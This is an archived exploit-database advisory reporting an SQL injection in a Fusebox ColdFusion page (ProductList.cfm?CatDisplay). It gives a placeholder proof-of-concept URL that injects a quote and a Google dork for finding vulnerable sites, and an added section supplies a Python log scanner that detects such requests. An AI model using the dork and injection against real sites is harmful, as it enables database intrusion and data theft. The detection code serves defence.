fusebox (ProductList.cfm?CatDisplay) Remote SQL Injection Vulnerability

2010-05-29T00:00:00
ID 1337DAY-ID-12439
Type zdt
Reporter Shamus
Modified 2010-05-29T00:00:00

Description

Exploit for the Windows platform in the web applications category

=======================================================================
fusebox (ProductList.cfm?CatDisplay) Remote SQL Injection Vulnerability
=======================================================================


Author       : Shamus
Date         : May 29th, 2010
Location     : Solo && Jogjakarta, Indonesia
Web          : http://antijasakom.org/forum
Critical Lvl : Moderate
Impact       :-
Where        : From Remote
---------------------------------------------------------------------------
 
 
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : -
Version     : -
Vendor      : http://www.fusebox.org/
Download    : http://www.fusebox.org/go/getting-started/downloading-fusebox
Description : Fusebox is the most popular framework for building ColdFusion and PHP
web applications. "Fuseboxers" find that the framework releases
them from much of the drudgery of writing applications and enables them
to focus their efforts on creating great, customer-focused software.
--------------------------------------------------------------------------
 
 
 
Vulnerability:
~~~~~~~~~~~~
-
 
PoC/Exploit:
~~~~~~~~~~
 
http://127.0.0.1/ProductList.cfm?CatDisplay=1%27[SQL query]
http://127.0.0.1/[path]/ProductList.cfm?CatDisplay=1%27[SQL query]
 
 
Dork:
~~~~~
Google : ProductList.cfm?CatDisplay
 
 
Solution:
~~~~~
-
N/A.
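
Detection (added example, not part of the original advisory or of Fusebox): the PoC appends an encoded single quote (%27) to the CatDisplay value, so one check is to scan web server access logs for ProductList.cfm requests whose CatDisplay is not a plain integer. The integer-only rule is an assumption drawn from the PoC's CatDisplay=1, and the log lines and the name suspicious_requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [29/May/2010:10:00:01 +0000] "GET /ProductList.cfm?CatDisplay=7 HTTP/1.1" 200 5120
192.0.2.11 - - [29/May/2010:10:00:05 +0000] "GET /shop/ProductList.cfm?CatDisplay=1%27 HTTP/1.1" 500 812
192.0.2.12 - - [29/May/2010:10:00:09 +0000] "GET /shop/productlist.cfm?page=2&catdisplay=2x HTTP/1.1" 200 5120
192.0.2.13 - - [29/May/2010:10:00:12 +0000] "GET /index.cfm?CatDisplay=abc HTTP/1.1" 200 900
192.0.2.14 - - [29/May/2010:10:00:15 +0000] "GET /ProductList.cfm HTTP/1.1" 200 5120
"""

# client address, request target and status code from one log line
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# Assumption: CatDisplay is a numeric category id, as in the PoC's CatDisplay=1
INT_RE = re.compile(r"[0-9]{1,10}")


def suspicious_requests(log_text):
    """Return (client, decoded CatDisplay value, status) for each request to
    ProductList.cfm whose CatDisplay is not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        # File names and URL parameter names are matched case-insensitively,
        # because ColdFusion treats URL variable names that way.
        if not url.path.lower().endswith("/productlist.cfm"):
            continue
        # parse_qsl percent-decodes values, so %27 is compared as a quote.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name.lower() == "catdisplay" and not INT_RE.fullmatch(value):
                hits.append((client, value, int(status)))
    return hits


if __name__ == "__main__":
    for client, value, status in suspicious_requests(SAMPLE_LOG):
        print(f"{client} sent CatDisplay={value!r} (HTTP {status})")
```

A hit paired with a 500 status suggests the value reached the database layer unvalidated; the same integer-only rule can be enforced in the application before the value is used in a query.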


